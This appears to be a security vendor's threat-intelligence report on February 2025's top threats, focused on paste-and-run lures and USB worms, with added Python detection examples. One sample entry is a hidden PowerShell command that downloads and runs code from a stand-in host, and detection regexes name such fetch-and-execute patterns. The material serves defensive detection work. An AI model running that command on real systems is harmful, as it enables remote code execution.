Highlights from February
SocGholish came in number 1 on our top 10 most prevalent threat list for the first time since April 2024. It’s been on the list for over a year now, placing somewhere in the top 10 every month since December 2023—frequently enough to rank first in the newly released 2025 Threat Detection Report, which lists the top 10 threats for all of 2024. Its fake update brethren, Scarlet Goldfinch, returned to the list this month in 4th and delivered enough NetSupport Manager for that threat to be one of our 9th place ties.
Paste and run, the initial access technique that tricks users into executing PowerShell code, shows no sign of slowing down. Last month we saw paste and run (aka ClickFix) as precursor activity for several payloads including LummaC2, Vidar, and XMRig. While the fake CAPTCHA-style lure remains popular, other types of lures are still used. For example, a recent report shared details of paste and run activity that spawns as a fake error message from a malicious phishing attachment. This report also shows the lure coaching the user to use WIN+X, instead of the previously seen WIN+R. This is notable because WIN+X opens the same menu as WIN+R without generating a RunMRU key as evidence of execution.
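Because the RunMRU key is the artifact that WIN+R leaves behind and WIN+X does not, responders who triage a suspected paste-and-run host usually want to read that key and flag anything that looks like a pasted PowerShell one-liner. The following script is an added example, not code from the original post or from Red Canary: it parses the value layout of `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` (lettered values holding one command each with a trailing `\1` marker, and an `MRUList` value giving most-recent-first order) from a constructed sample dictionary so it runs offline, and the keyword list it uses to flag entries is an assumption chosen for illustration.

```python
"""Parse a RunMRU key (the WIN+R artifact) and flag paste-and-run style entries.

Added example; the registry values below are constructed, not taken from a real host.
On a live system the same dictionary could be built with winreg.EnumValue over the key.
"""
import re

# Constructed sample of the RunMRU key's values. Each lettered value is one
# command the user typed into the Run dialog, stored with a trailing "\1";
# MRUList lists the letters most-recent-first.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iwr http://example.invalid/p | iex"\\1',  # constructed lure
    "c": "mstsc\\1",
    "MRUList": "bca",
}

# Patterns typical of pasted one-liners (assumption: tune to your own telemetry).
SUSPICIOUS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"\bpowershell\b.*?(-enc\b|-e\b|-w\s+hidden|\biex\b|invoke-expression|\biwr\b|downloadstring)",
        r"\bmshta\b\s+\S*https?://",
        r"\bcmd(\.exe)?\b.*\bcurl\b.*\|",
    )
]


def ordered_entries(runmru: dict) -> list:
    """Return RunMRU commands most-recent-first, with the trailing '\\1' marker removed."""
    order = runmru.get("MRUList", "")
    entries = []
    for letter in order:
        raw = runmru.get(letter)
        if raw is None:
            continue  # MRUList can reference a value that was deleted
        if raw.endswith("\\1"):
            raw = raw[:-2]
        entries.append(raw)
    return entries


def flag_paste_and_run(entries: list) -> list:
    """Return the subset of Run dialog entries that match a paste-and-run pattern."""
    return [e for e in entries if any(p.search(e) for p in SUSPICIOUS_PATTERNS)]


if __name__ == "__main__":
    recent = ordered_entries(SAMPLE_RUNMRU)
    for cmd in recent:
        print("RunMRU:", cmd)
    for hit in flag_paste_and_run(recent):
        print("SUSPICIOUS:", hit)
```

An empty or clean RunMRU key is not evidence that nothing ran: as the post notes, a lure that steers the user through WIN+X leaves no entry here, so this check complements process telemetry (a PowerShell child of explorer.exe with a network-fetching command line) rather than replacing it.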
Four threats on our top 10 list this month—Phorpiex, Tangerine Turkey, Gamarue, and PyFileDel—are worms, with Phorpiex and PyFileDel making their debut on the list tied for 4th and 9th places respectively. Read more about worm threats below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for February 2025:
Month's rank | Threat name | Threat description
---|---|---
⬆ 1 | SocGholish | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code
⬆ 2 | | Red Canary's name for a cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities
⬆ 3 | | Red Canary's name for a suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper
⬆ 4* | Mimikatz | Open source tool that dumps credentials using various techniques
⬆ 4* | Phorpiex | IRC-based botnet that spreads via USB worm functionality and also sends spam emails to phish additional users, and has reportedly delivered ransomware and cryptocurrency miners
⬆ 4* | Tangerine Turkey | Red Canary's name for a VBS worm that is delivered via an infected USB and uses a printui DLL hijack to deliver a cryptomining payload
⬆ 9* | Adload | macOS malware that attempts to hijack and redirect user web browsing traffic
⬇ 9* | Gamarue | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives
⬇ 9* | Impacket | Collection of Python classes to construct/manipulate network protocols
⬇ 9* | NetSupport Manager | Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access
⬆ 9* | PyFileDel | Python worm that propagates by copying itself to physical and removable drives
⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month
* Denotes a tie
Digging up worms
Four worms made this month’s top 10 list—Phorpiex, Tangerine Turkey, Gamarue, and PyFileDel—which provides a good opportunity to dig into them a little bit. We track over 30 worms at Red Canary, from traditional worms like Conficker—which has been in our top 10 before, most recently in August 2023—to newer USB worms like Tangerine Turkey and Raspberry Robin. Two additional worms, Ippedo and Bondat, have also previously made our top 10 list.
At Red Canary, when we use the term “worm,” we are almost always referring to a USB worm that propagates by itself via removable drives onto victim systems. The traditional definition of a worm—a threat that self-replicates or propagates across an environment from one system to another without additional user interaction—is not something that we see as frequently.
So when we refer to a worm, we mean:
- Distribution is not actively controlled by adversaries; it is passive, opportunistic, and appears to self-propagate from infected systems onto removable media.
- We can observe a worm’s installation and execution behaviors, as well as persistence mechanisms it creates.
- We typically don’t have insight into replication onto USB drives plugged into the victim endpoint, or initial infection vectors for the USB prior to being plugged into the endpoint, although sometimes we are able to learn more using OSINT or shared intelligence.
It’s worth taking a look at the context of this past month’s activity, lest we give the impression we are seeing an unusual wave of worms:
- The presence of worms varies from environment to environment, depending largely on USB use cases and policies. Once worms are in an environment they can be challenging to remove entirely, meaning some of our customers may see frequent worm threats while others see few to none. One of the top MITRE ATT&CK® techniques we saw in manufacturing environments last year was T1091, Replication Through Removable Media. Since manufacturers likely have use cases for USB devices in their workflows, they may have more permissive USB and device policies, which in turn makes them more vulnerable to USB worms.
- Worm use over many years combined with their persistent nature means we regularly detect worms, regardless of whether they manifest in large enough numbers to make it into the top 10. For example, we’ve observed Phorpiex consistently since 2021 even though this is its first time in the top 10. The same is true for many of the other worms we track.
- As an initial access vector still in use by adversaries, worms are subject to waxing and waning popularity. This includes observed fluctuations in previously existing worms, the appearance of new USB worms, and new campaigns leveraging USBs to distribute existing malware families.
One solid mitigation strategy for USB worms is to implement a restrictive USB and removable media policy, giving these threats no opportunity to infect endpoints in your environment. In situations where USB drives are allow-listed, there are detection opportunities for worms. They can vary, depending on the worm and its behaviors. We frequently see worms leverage Windows Command Shell as part of the execution process, which gives us a detection opportunity.
Detection opportunity: Windows Explorer spawning Command Shell with start and exit commands
The following pseudo-detection analytic looks for instances of explorer.exe spawning cmd.exe along with corresponding start and exit commands that we commonly observe in conjunction with a wide variety of malicious activity, including worms like Phorpiex and Ippedo.

parent_process == (explorer.exe)
&&
process == (cmd.exe)
&&
command_includes ("start" && "exit")
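To show how the pseudo-analytic above behaves on actual process telemetry, here is an added example that is not part of the original post or of Red Canary's detection engineering: it implements the three conditions over a handful of constructed process-creation events, normalizing image paths to bare file names and matching the two keywords as whole words so that `start` and `exit` are found whether they are separated by spaces or joined by `&`. The event field names and the sample command lines are assumptions for illustration.

```python
"""Explorer.exe -> cmd.exe with 'start' and 'exit' in the command line.

Added example implementing the pseudo-analytic over constructed events; the
field names and sample command lines are assumptions, not real telemetry.
"""
import re
from dataclasses import dataclass

START_RE = re.compile(r"\bstart\b", re.IGNORECASE)
EXIT_RE = re.compile(r"\bexit\b", re.IGNORECASE)


@dataclass
class ProcessEvent:
    parent_image: str   # full path or bare name of the parent process
    image: str          # full path or bare name of the created process
    command_line: str   # command line of the created process


def image_name(path: str) -> str:
    """Reduce 'C:\\Windows\\explorer.exe' or 'explorer.exe' to a lowercase file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def matches_explorer_cmd_start_exit(ev: ProcessEvent) -> bool:
    """parent == explorer.exe && process == cmd.exe && command_includes('start' && 'exit')."""
    if image_name(ev.parent_image) != "explorer.exe":
        return False
    if image_name(ev.image) != "cmd.exe":
        return False
    return bool(START_RE.search(ev.command_line) and EXIT_RE.search(ev.command_line))


def run_detection(events: list) -> list:
    """Return the indexes of events that trip the analytic."""
    return [i for i, ev in enumerate(events) if matches_explorer_cmd_start_exit(ev)]


# Constructed sample events (drive letters, file names and paths are made up).
SAMPLE_EVENTS = [
    # 0: shortcut on a removable drive launching a hidden payload, then exiting
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c start "" /min "E:\\_\\update.vbs"&exit'),
    # 1: explorer -> cmd with start but no exit (benign-looking shortcut)
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c start notepad.exe'),
    # 2: right parent/child, keywords present, upper-case path variants
    ProcessEvent(r"C:\WINDOWS\Explorer.EXE", "CMD.EXE",
                 "CMD /C START WSCRIPT //B run.vbs & EXIT"),
    # 3: wrong parent (a scheduled task host), otherwise identical command line
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c start "" "C:\\Tools\\backup.bat" & exit'),
    # 4: wrong child (PowerShell), keywords present
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Start-Process calc; exit"),
]


if __name__ == "__main__":
    for idx in run_detection(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: {SAMPLE_EVENTS[idx].command_line}")
```

Expect some benign hits from this analytic on its own (installer shortcuts and help-desk batch files also chain `start` and `exit`), so in practice it is tuned with context the post's worm descriptions point at: the launched file living on a removable drive, a VBS or script interpreter as the next child, or a subsequent DLL hijack such as the printui technique Tangerine Turkey uses.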